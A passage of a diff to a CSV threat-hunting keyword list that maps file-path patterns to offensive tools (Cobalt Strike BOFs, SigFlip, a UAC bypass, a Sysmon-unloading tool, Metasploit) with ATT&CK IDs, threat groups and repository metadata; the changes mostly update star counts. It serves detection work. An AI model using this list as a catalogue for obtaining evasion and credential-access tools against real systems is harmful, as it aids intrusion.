tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" -"*/shellshock.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/shellshock.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/sherlocksecurity/*","offensive_tool_keyword","POC","POC and exploit tools on github","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Shhmon/*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*/ShimsInstaller.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ShimsInstaller.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/shocknawe/*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*/shodan-api.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/shspawnas/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/shspawnas/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/ShuckNT.git*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*/si1ent-le/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/si1ent-le/CVE-2022-0847","1","1","N/A","N/A","1","0","2","2022-03-08T05:18:15Z","2022-03-08T04:51:02Z" -"*/SigFlip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/SigFlip/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/SigLoader.go*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/SigLoader/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/SigLoader/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigFlip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigFlip/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader.go*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/signer-exe.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" -"*/SilentClean/SilentClean/*.cs*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" -"*/silentdump.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 